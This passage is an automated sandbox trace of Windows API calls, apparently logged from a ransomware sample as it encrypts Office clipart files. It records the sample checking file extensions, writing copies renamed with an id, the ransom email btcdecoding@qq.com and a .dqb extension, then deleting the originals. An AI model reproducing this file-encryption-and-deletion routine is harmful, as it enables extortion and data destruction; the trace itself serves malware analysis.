Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0052.565] lstrlenW (lpString=".dbf") returned 4 [0052.565] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0052.565] lstrlenW (lpString=".1cd") returned 4 [0052.565] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0052.565] lstrlenW (lpString=".jpg") returned 4 [0052.565] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.018] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.018] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.019] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0053.019] GetLastError () returned 0x0 [0053.019] ReadFile (in: hFile=0x218, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xc48, lpOverlapped=0x0) returned 1 [0053.020] WriteFile (in: hFile=0x22c, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xc50, lpOverlapped=0x0) returned 1 [0053.023] ReadFile (in: hFile=0x218, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.023] WriteFile (in: hFile=0x22c, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.023] SetEndOfFile (hFile=0x22c) returned 1 [0053.023] CloseHandle (hObject=0x22c) returned 1 [0053.024] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.024] SetEndOfFile (hFile=0x218) returned 1 [0053.024] CloseHandle (hObject=0x218) returned 1 [0053.024] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.025] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf")) returned 1 [0053.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0053.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0053.025] lstrlenW (lpString=".doc") returned 4 [0053.025] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.025] lstrlenW (lpString=".docx") returned 5 [0053.025] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.025] lstrlenW (lpString=".pdf") returned 4 [0053.025] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.025] lstrlenW (lpString=".xls") returned 4 [0053.025] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.025] lstrlenW (lpString=".xlsx") returned 5 [0053.025] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.025] lstrlenW (lpString=".ppt") returned 4 [0053.025] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0053.025] lstrlenW (lpString=".zip") returned 4 [0053.025] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.025] lstrlenW (lpString=".rar") returned 4 [0053.025] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.025] lstrlenW (lpString=".bz2") returned 4 [0053.025] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.025] lstrlenW (lpString=".7z") returned 3 [0053.026] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0053.026] lstrlenW (lpString=".dbf") returned 4 [0053.026] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0053.026] lstrlenW (lpString=".1cd") returned 4 [0053.026] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0053.026] lstrlenW (lpString=".jpg") returned 4 [0053.026] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.026] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.027] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.027] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0053.027] GetLastError () returned 0x0 [0053.027] ReadFile (in: hFile=0x218, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x10c8, lpOverlapped=0x0) returned 1 [0053.028] WriteFile (in: hFile=0x22c, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x10d0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x10d0, lpOverlapped=0x0) returned 1 [0053.030] ReadFile (in: hFile=0x218, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.030] WriteFile (in: hFile=0x22c, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.030] SetEndOfFile (hFile=0x22c) returned 1 [0053.030] CloseHandle (hObject=0x22c) returned 1 [0053.030] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.030] SetEndOfFile (hFile=0x218) returned 1 [0053.031] CloseHandle (hObject=0x218) returned 1 [0053.031] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.031] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf")) returned 1 [0053.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0053.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0053.032] lstrlenW (lpString=".doc") returned 4 [0053.032] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.032] lstrlenW (lpString=".docx") returned 5 [0053.032] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.032] lstrlenW (lpString=".pdf") returned 4 [0053.032] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.032] lstrlenW (lpString=".xls") returned 4 [0053.032] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.032] lstrlenW (lpString=".xlsx") returned 5 [0053.032] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.032] lstrlenW (lpString=".ppt") returned 4 [0053.032] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0053.032] lstrlenW (lpString=".zip") returned 4 [0053.032] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.032] lstrlenW (lpString=".rar") returned 4 [0053.032] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.032] lstrlenW (lpString=".bz2") returned 4 [0053.032] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.033] lstrlenW (lpString=".7z") returned 3 [0053.033] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0053.033] lstrlenW (lpString=".dbf") returned 4 [0053.033] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0053.033] lstrlenW (lpString=".1cd") returned 4 [0053.033] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0053.033] lstrlenW (lpString=".jpg") returned 4 [0053.033] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.033] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.033] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0053.033] GetLastError () returned 0x0 [0053.033] ReadFile (in: hFile=0x218, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xc9c, lpOverlapped=0x0) returned 1 [0053.035] WriteFile (in: hFile=0x22c, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xca0, lpOverlapped=0x0) returned 1 [0053.036] ReadFile (in: hFile=0x218, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.036] WriteFile (in: hFile=0x22c, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.036] SetEndOfFile (hFile=0x22c) returned 1 [0053.036] CloseHandle (hObject=0x22c) returned 1 [0053.036] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.036] SetEndOfFile (hFile=0x218) returned 1 [0053.037] CloseHandle (hObject=0x218) returned 1 [0053.037] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.037] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf")) returned 1 [0053.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0053.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0053.037] lstrlenW (lpString=".doc") returned 4 [0053.037] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.037] lstrlenW (lpString=".docx") returned 5 [0053.038] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.038] lstrlenW (lpString=".pdf") returned 4 [0053.038] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.038] lstrlenW (lpString=".xls") returned 4 [0053.038] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.038] lstrlenW (lpString=".xlsx") returned 5 [0053.038] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.038] lstrlenW (lpString=".ppt") returned 4 [0053.038] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0053.038] lstrlenW (lpString=".zip") returned 4 [0053.038] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.038] lstrlenW (lpString=".rar") returned 4 [0053.038] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.038] lstrlenW (lpString=".bz2") returned 4 [0053.038] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.038] lstrlenW (lpString=".7z") returned 3 [0053.038] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0053.038] lstrlenW (lpString=".dbf") returned 4 [0053.038] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0053.038] lstrlenW (lpString=".1cd") returned 4 [0053.038] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0053.038] lstrlenW (lpString=".jpg") returned 4 [0053.038] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.038] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.039] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.039] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0053.039] GetLastError () returned 0x0 [0053.039] ReadFile (in: hFile=0x218, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x12c8, lpOverlapped=0x0) returned 1 [0053.040] WriteFile (in: hFile=0x22c, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x12d0, lpOverlapped=0x0) returned 1 [0053.041] ReadFile (in: hFile=0x218, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.041] WriteFile (in: hFile=0x22c, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.041] SetEndOfFile (hFile=0x22c) returned 1 [0053.041] CloseHandle (hObject=0x22c) returned 1 [0053.042] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.042] SetEndOfFile (hFile=0x218) returned 1 [0053.042] CloseHandle (hObject=0x218) returned 1 [0053.042] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.043] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf")) returned 1 [0053.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0053.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0053.043] lstrlenW (lpString=".doc") returned 4 [0053.043] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.043] lstrlenW (lpString=".docx") returned 5 [0053.043] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.043] lstrlenW (lpString=".pdf") returned 4 [0053.043] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.043] lstrlenW (lpString=".xls") returned 4 [0053.043] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.043] lstrlenW (lpString=".xlsx") returned 5 [0053.043] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.043] lstrlenW (lpString=".ppt") returned 4 [0053.043] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0053.043] lstrlenW (lpString=".zip") returned 4 [0053.043] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.043] lstrlenW (lpString=".rar") returned 4 [0053.043] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.043] lstrlenW (lpString=".bz2") returned 4 [0053.043] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.044] lstrlenW (lpString=".7z") returned 3 [0053.044] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0053.044] lstrlenW (lpString=".dbf") returned 4 [0053.044] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0053.044] lstrlenW (lpString=".1cd") returned 4 [0053.044] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0053.044] lstrlenW (lpString=".jpg") returned 4 [0053.044] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.044] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.044] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0053.044] GetLastError () returned 0x0 [0053.044] ReadFile (in: hFile=0x218, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x1384, lpOverlapped=0x0) returned 1 [0053.046] WriteFile (in: hFile=0x22c, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x1390, lpOverlapped=0x0) returned 1 [0053.047] ReadFile (in: hFile=0x218, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.047] WriteFile (in: hFile=0x22c, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.047] SetEndOfFile (hFile=0x22c) returned 1 [0053.047] CloseHandle (hObject=0x22c) returned 1 [0053.047] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.047] SetEndOfFile (hFile=0x218) returned 1 [0053.048] CloseHandle (hObject=0x218) returned 1 [0053.048] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.048] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf")) returned 1 [0053.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0053.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0053.048] lstrlenW (lpString=".doc") returned 4 [0053.048] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.049] lstrlenW (lpString=".docx") returned 5 [0053.049] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.049] lstrlenW (lpString=".pdf") returned 4 [0053.049] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.049] lstrlenW (lpString=".xls") returned 4 [0053.049] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.049] lstrlenW (lpString=".xlsx") returned 5 [0053.049] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.049] lstrlenW (lpString=".ppt") returned 4 [0053.049] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0053.049] lstrlenW (lpString=".zip") returned 4 [0053.049] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.049] lstrlenW (lpString=".rar") returned 4 [0053.049] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.049] lstrlenW (lpString=".bz2") returned 4 [0053.049] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.049] lstrlenW (lpString=".7z") returned 3 [0053.049] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0053.049] lstrlenW (lpString=".dbf") returned 4 [0053.049] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0053.049] lstrlenW (lpString=".1cd") returned 4 [0053.049] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0053.049] lstrlenW (lpString=".jpg") returned 4 [0053.049] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.049] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.050] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0053.050] GetLastError () returned 0x0 [0053.050] ReadFile (in: hFile=0x218, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x138c, lpOverlapped=0x0) returned 1 [0053.052] WriteFile (in: hFile=0x22c, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x1390, lpOverlapped=0x0) returned 1 [0053.052] ReadFile (in: hFile=0x218, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.053] WriteFile (in: hFile=0x22c, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, 